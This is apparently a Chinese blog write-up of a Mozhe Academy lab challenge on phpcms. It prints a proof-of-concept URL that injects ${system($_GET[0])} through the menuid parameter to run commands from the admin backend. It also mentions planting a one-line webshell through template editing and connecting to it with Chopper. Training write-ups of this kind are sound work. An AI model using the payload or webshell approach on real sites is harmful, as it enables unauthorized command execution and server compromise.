美文网首页
墨者学院-CMS系统漏洞分析溯源(第2题)

墨者学院-CMS系统漏洞分析溯源(第2题)

作者: nohands_noob | 来源:发表于2019-07-13 16:19 被阅读0次

    靶场地址:
    https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe

    用到的漏洞介绍:

    漏洞编号:WooYun-2015-0153630

    漏洞名称:phpcms后台低权限任意命令执行

    Poc:

    index.php?0=[命令]&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block
    

    首先找到后台地址,养成好习惯先查看robots.txt是否有有用的信息


    发现了后台地址,并且账号密码自动填充,可以直接登录
    这里获得key有两种方法,一种是在界面-模板风格修改代码注入一句话木马,然后使用菜刀连接。

    一种是使用上述漏洞执行代码
    执行ls命令,发现key所在


    执行cat key_16041211526820.php,查看网页源代码


    相关文章

      网友评论

          本文标题:墨者学院-CMS系统漏洞分析溯源(第2题)

          本文链接:https://www.haomeiwen.com/subject/xrrmkctx.html